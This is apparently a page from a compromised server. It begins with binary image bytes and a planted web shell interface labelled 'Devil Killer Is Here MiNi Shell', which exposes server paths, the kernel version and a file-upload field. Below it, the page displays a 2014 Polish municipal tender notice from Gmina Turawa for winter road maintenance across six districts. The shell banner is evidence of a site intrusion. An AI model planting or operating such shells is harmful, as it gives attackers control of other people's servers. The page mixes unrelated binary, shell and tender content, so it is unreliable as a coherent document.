JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20141125/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20141125/385966-N-2014.html

<p class="kh_header"><b>Turawa: Zimowe utrzymanie dróg gminnych w sezonie zimowym 
2014/2015, 2015/2016, 2016/2017 w Gminie Turawa</b><br>
<b>Numer ogłoszenia: 385966 - 2014; data zamieszczenia: 25.11.2014</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Turawa , ul. Opolska 39c, 46-045 Turawa, woj. opolskie, tel. 077 4212012, faks 077 4212073.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.turawa.pl</li><li><b>Adres strony internetowej, pod którym dostępne są informacje dotyczące dynamicznego systemu zakupów:</b> nie dotyczy</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Zimowe utrzymanie dróg gminnych w sezonie zimowym 
2014/2015, 2015/2016, 2016/2017 w Gminie Turawa.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1.	Przedmiotem zamówienia jest:
Zimowe utrzymanie dróg gminnych w sezonie zimowym 2014/2015, 2015/2016, 2016/2017 w Gminie Turawa.

2.	Zakres zamówienia obejmuje:
1)	odśnieżanie dróg na całej szerokości pasa ruchu pojazdów;
2)	posypywanie pasa ruchu pojazdów mieszanką piasku z solą;
3)	usuwanie i zwalczanie gołoledzi na bieżąco w miarę zaistniałych potrzeb (opady mżawki).

3.	Obszar Gminy Turawa został podzielony na 6 części (obwodów).
W zakres przedmiotu zamówienia wchodzi zimowe utrzymanie dróg gminnych w         miejscowościach:

1)	Zawada (bez Osiedla Zawada), Kotórz Mały:
Przewidywana ilość godzin w sezonie zimowym 2014/2015, 2015/2016, 2016/2017 wynosi:
a)	Odśnieżanie - 642 godzin;
b)	Posypywanie piaskiem z solą - 111 godziny.

2)	Osiedle Zawada;
Przewidywana ilość godzin w sezonie zimowym 2014/2015, 2015/2016, 2016/2017  wynosi:
a)	Odśnieżanie - 83 godziny;
b)	Posypywanie piaskiem z solą - 48 godzin.

3)	Węgry, Osowiec, Trzęsina;
Przewidywana ilość godzin w sezonie zimowym 2014/2015, 2015/2016, 2016/2017  wynosi:
a)	Odśnieżanie - 374 godziny;
b)	Posypywanie piaskiem z solą - 45 godzin.

4)	Turawa, Marszałki, Kotórz Wielki, południowy brzeg Jeziora Dużego, Turawa - ul. Wodna od drogi powiatowej do posesji nr 1;
Przewidywana ilość godzin w sezonie zimowym 2014/2015, 2015/2016, 2016/2017  wynosi:
a)	Odśnieżanie - 480 godzin;
b)	Posypywanie piaskiem z solą - 87 godzin.

5)	Bierdzany, Kadłub Turawski, Rzędów i północny brzeg Jeziora Dużego;
Przewidywana ilość godzin w sezonie zimowym 2014/2015, 2015/2016, 2016/2017  wynosi:
a)	Odśnieżanie - 537 godzin;
b)	Posypywanie piaskiem z solą - 66 godzin.


Przewidywana ilość godzin w sezonie zimowym 2014/2015, 2015/2016, 2016/2017  wynosi:
a)	Odśnieżanie - 362 godziny;
b)	Posypywanie piaskiem z solą - 24 godziny.</p>
<p><b>II.1.5) przewiduje się udzielenie zamówień uzupełniających:</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li><li>Przedmiotem zamówień uzupełniających jest powtórzenie tego samego rodzaju usług co w zamówieniu podstawowym, stanowiących nie więcej niż 50% wartości zamówienia podstawowego, zgodnie z art. 67 ust. 1 pkt 6  Prawa zamówień publicznych.</li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 90.62.00.00-9, 90.63.00.00-2.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 6.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.04.2017.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie  wymaga wniesienia wadium</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca musi dysponować przynajmniej jednym pługiem śnieżnym i jedną piaskarką lub min. jednym ciągnikiem rolniczym wyposażonym w pług i rozsypywacz ciągnikowy albo min. jedną pługopiaskarka - dopuszczonymi do ruchu na podstawie ustawy z dnia 20 czerwca 1997r. Prawo o ruchu drogowym (tj. z 2012r. Dz. U. poz.1137 z późn. zm.), dla każdej części (obwodu).
Składając ofertę na kilka części (obwodów) Wykonawca musi dysponować przynajmniej jednym pługiem śnieżnym i jedną piaskarką każdej części z osobna. 
Każdy dodatkowy sprzęt przeznaczony do zimowego utrzymania dróg w danym obwodzie będzie dodatkowo punktowany w ramach kryterium oceny ofert. Jednak protokólarne stwierdzenie nie wykorzystania w terenie wykazanego w ofercie sprzętu skutkować będzie karą umowną w wysokości 500 zł brutto.
Ocena spełnienia warunku nastąpi na podstawie złożonego przez Wykonawcę:
1)	wykazu narzędzi, wyposażenia zakładu i urządzeń technicznych dostępnych wykonawcy usług w celu wykonania zamówienia wraz z informacją o podstawie do dysponowania tymi zasobami (zgodnie  załącznikiem nr 5 do SIWZ).
W przypadku  wspólnego ubiegania się dwóch lub więcej wykonawców o udzielenie niniejszego zamówienia, oceniany będzie ich  łączny potencjał kadrowy oraz  kwalifikacje.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca musi dysponować przynajmniej jedną osobą dla każdej części zamówienia,   obsługującą powyższe urządzenia, posiadającą odpowiednie uprawnienia do    kierowania pojazdami samochodowymi lub ciągnikami rolniczymi, o których mowa w ustawie z dnia 20 czerwca 1997r. Prawo o ruchu drogowym (tj. z 2012r. Dz. U. poz.1137 z późn. zm.).
Składając ofertę na kilka części (obwodów) Wykonawca musi dysponować przynajmniej jedną osobą obsługującą wykazane urządzenia dla każdej części z osobna. 
Do każdego dodatkowego sprzętu wykazanego w załączniku nr 6 do SIWZ w danym obwodzie, Wykonawca musi dysponować przynajmniej jedną osobą obsługującą dane urządzenia.
Ocena spełnienia warunku nastąpi na podstawie złożonego przez Wykonawcę:
1)	wykazu osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informację o podstawie do dysponowania tymi osobami (zgodnie  załącznikiem nr 6 do SIWZ);
3)	oświadczenia, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia jeżeli ustawy nakładają obowiązek posiadania takich uprawnień (zgodnie z załącznikiem nr 7 do SIWZ).
W przypadku  wspólnego ubiegania się dwóch lub więcej wykonawców o udzielenie niniejszego zamówienia, oceniany będzie ich  łączny potencjał kadrowy oraz  kwalifikacje.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz narzędzi, wyposażenia zakładu i urządzeń technicznych dostępnych wykonawcy usług lub robót budowlanych w celu wykonania zamówienia wraz z informacją o podstawie do dysponowania tymi zasobami;</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1.	formularz ofertowy  (zgodnie z  załącznikiem nr 1 do SIWZ);
2.	oświadczenie o spełnieniu warunków udziału w postępowaniu (zgodnie z załącznikiem nr 2 do SIWZ);
3.	oświadczenie, że wykonawca nie zalega z opłacaniem podatków;
4.	oświadczenie, że wykonawca nie zalega z opłacaniem składek na ubezpieczenia zdrowotne i społeczne.</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p><ul class="kh_indent_1">
<li>1 - Cena - 80</li>
<li>2 - Liczba sprzętu w danej części (obwodzie) - 20</li>
</ul>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający przewiduje możliwość dokonania istotnych zmian postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy. 
1)	Zmiany przewidziane w umowie mogą być inicjowane przez Zamawiającego lub przez Wykonawcę.
2)	Zmiany umowy mogą dotyczyć:
a)	wystąpienia wyjątkowych okoliczności, niezależnych od stron umowy, których nie można było przewidzieć w chwili zawierania umowy, a wpływają na jej realizację;
b)	terminu wykonania zamówienia - możliwość zmiany terminu wykonania zamówienia w sytuacjach, których nie można było przewidzieć z chwila wszczęcia niniejszego postępowania, w szczególności wystąpienia warunków klimatycznych, powodujących konieczność utrzymania dróg wstanie przejezdności;
c)	zmiana stawki i kwoty podatku VAT, łącznie z konsekwencjami rachunkowymi dotyczącymi obliczenia kwoty brutto - przypadku wejścia w życie zmian odpowiednich przepisów prawa.
d)	waloryzację cen wg. wskaźnika GUS, według średniorocznego wskaźnika wzrostu cen towarów i usług, po okresie 12 miesięcy od obowiązywania umowy.
e)	Innych przyczyn zewnętrznych niezależnych od Zamawiającego i Wykonawcy skutkujących niemożliwością wykonania przedmiotu zamówienia. 
3)	Zamawiający zastrzega sobie prawo zamiany ceny podanej w ofercie (nie dotyczy cen jednostkowych), obliczonej na podstawie przewidywanych ilość godzin w sezonie zimowym 2014/2015, 2015/2016, 2016/2017 w zależności od rzeczywiście wykonanej usługi. Wielkość zamówienia będzie zależna od warunków atmosferycznych
4)	Wykonawca może dokonywać zmiany osób odpowiedzialnych za wykonanie zamówienia, przedstawionych w ofercie, jedynie za uprzednią pisemną zgodą Zamawiającego, akceptującego nowe osoby z wyłączeniem sytuacji określonej w ust. 4 punkt a).
5)	Wykonawca z własnej inicjatywy proponuje zmianę osób odpowiedzialnych za wykonanie zamówienia  w następujących przypadkach:
a)	śmierci i długotrwałej choroby powyżej 30 dni;
b)	niewywiązywania się osoby  odpowiedzialnej za wykonanie zamówienia z obowiązków wynikających z umowy;
c)	jeżeli zmiana osoby  odpowiedzialnej za wykonanie zamówienia stanie się konieczna z jakichkolwiek innych przyczyn niezależnych od Wykonawcy (np. rezygnacji itp.).
6)	Zamawiający może zażądać od Wykonawcy zmiany osób  odpowiedzialnych za wykonanie zamówienia, jeżeli uzna, że osoby te nie wykonują swoich obowiązków wynikających z umowy.
7)	W przypadku zmiany osoby  odpowiedzialnej za wykonanie zamówienia nowa osoba musi spełniać wymagania określone w SIWZ.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.bip.turawa.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Gminy Turawa,
Ul. Opolska 39c,
46-045 Turawa,
Pokój nr 36 - I piętro.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 03.12.2014 godzina 10:00, miejsce: Urząd Gminy Turawa,
Ul. Opolska 39c,
46-045 Turawa,
Pokój nr 30 - I piętro.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Nie dotyczy.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Zimowe utrzymanie dróg gminnych w sezonie zimowym 2014/2015, 2015/2016, 2016/2017 w obwodzie nr I, obejmującej miejscowości: Zawada (bez Osiedla Zawada), Kotórz Mały.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zakres zamówienia obejmuje:
1)	odśnieżanie dróg na całej szerokości pasa ruchu pojazdów;
2)	posypywanie pasa ruchu pojazdów mieszanką piasku z solą;
3)	usuwanie i zwalczanie gołoledzi na bieżąco w miarę zaistniałych potrzeb (opady mżawki).
Przewidywana ilość godzin w sezonie zimowym 2014/2015, 2015/2016, 2016/2017 wynosi:
a)	Odśnieżanie - 642 godzin;
b)	Posypywanie piaskiem z solą - 111 godziny.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 90.62.00.00-9, 90.63.00.00-2.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.04.2017.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 80</li>
<li>2. Liczba sprzętu w danej części (obwodzie) - 20</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Zimowe utrzymanie dróg gminnych w sezonie zimowym 2014/2015, 2015/2016, 2016/2017 w obwodzie nr II, obejmującej miejscowości: Osiedle Zawada.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zakres zamówienia obejmuje:
1)	odśnieżanie dróg na całej szerokości pasa ruchu pojazdów;
2)	posypywanie pasa ruchu pojazdów mieszanką piasku z solą;
3)	usuwanie i zwalczanie gołoledzi na bieżąco w miarę zaistniałych potrzeb (opady mżawki).
Przewidywana ilość godzin w sezonie zimowym 2014/2015, 2015/2016, 2016/2017  wynosi:
a)	Odśnieżanie - 83 godziny;
b)	Posypywanie piaskiem z solą - 48 godzin.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 90.62.00.00-9, 90.63.00.00-2.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.04.2017.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 80</li>
<li>2. Liczba sprzętu w danej części (obwodzie) - 20</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Zimowe utrzymanie dróg gminnych w sezonie zimowym 2014/2015, 2015/2016, 2016/2017 w obwodzie nr III, obejmującej miejscowości: Węgry, Osowiec, Trzęsina.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zakres zamówienia obejmuje:
1)	odśnieżanie dróg na całej szerokości pasa ruchu pojazdów;
2)	posypywanie pasa ruchu pojazdów mieszanką piasku z solą;
3)	usuwanie i zwalczanie gołoledzi na bieżąco w miarę zaistniałych potrzeb (opady mżawki).
Przewidywana ilość godzin w sezonie zimowym 2014/2015, 2015/2016, 2016/2017  wynosi:
a)	Odśnieżanie - 374 godziny;
b)	Posypywanie piaskiem z solą - 45 godzin.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 90.62.00.00-9, 90.63.00.00-2.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.04.2017.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 80</li>
<li>2. Liczba sprzętu w danej części (obwodzie) - 20</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> Zimowe utrzymanie dróg gminnych w sezonie zimowym 2014/2015, 2015/2016, 2016/2017 w obwodzie nr IV, obejmującej miejscowości: Turawa, Marszałki, Kotórz Wielki, południowy brzeg Jeziora Dużego, Turawa - ul. Wodna od drogi powiatowej do posesji nr 1.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zakres zamówienia obejmuje:
1)	odśnieżanie dróg na całej szerokości pasa ruchu pojazdów;
2)	posypywanie pasa ruchu pojazdów mieszanką piasku z solą;
3)	usuwanie i zwalczanie gołoledzi na bieżąco w miarę zaistniałych potrzeb (opady mżawki).
Przewidywana ilość godzin w sezonie zimowym 2014/2015, 2015/2016, 2016/2017  wynosi:
a)	Odśnieżanie - 480 godzin;
b)	Posypywanie piaskiem z solą - 87 godzin.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 90.62.00.00-9, 90.63.00.00-2.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.04.2017.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 80</li>
<li>2. Liczba sprzętu w danej części (obwodzie) - 20</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 5 <b>NAZWA:</b> Zimowe utrzymanie dróg gminnych w sezonie zimowym 2014/2015, 2015/2016, 2016/2017 w obwodzie nr V, obejmującej miejscowości: 5)	Bierdzany, Kadłub Turawski, Rzędów i północny brzeg Jeziora Dużego.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zakres zamówienia obejmuje:
1)	odśnieżanie dróg na całej szerokości pasa ruchu pojazdów;
2)	posypywanie pasa ruchu pojazdów mieszanką piasku z solą;
3)	usuwanie i zwalczanie gołoledzi na bieżąco w miarę zaistniałych potrzeb (opady mżawki).
Przewidywana ilość godzin w sezonie zimowym 2014/2015, 2015/2016, 2016/2017  wynosi:
a)	Odśnieżanie - 537 godzin;
b)	Posypywanie piaskiem z solą - 66 godzin.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 90.62.00.00-9, 90.63.00.00-2.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.04.2017.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 80</li>
<li>2. Liczba sprzętu w danej części (obwodzie) - 20</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 6 <b>NAZWA:</b> Zimowe utrzymanie dróg gminnych w sezonie zimowym 2014/2015, 2015/2016, 2016/2017 w obwodzie nr VI, obejmującej miejscowości: Ligota Turawska i Zakrzów Turawski.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zakres zamówienia obejmuje:
1)	odśnieżanie dróg na całej szerokości pasa ruchu pojazdów;
2)	posypywanie pasa ruchu pojazdów mieszanką piasku z solą;
3)	usuwanie i zwalczanie gołoledzi na bieżąco w miarę zaistniałych potrzeb (opady mżawki).
Przewidywana ilość godzin w sezonie zimowym 2014/2015, 2015/2016, 2016/2017  wynosi:
a)	Odśnieżanie - 362 godziny;
b)	Posypywanie piaskiem z solą - 24 godziny.</p></li>
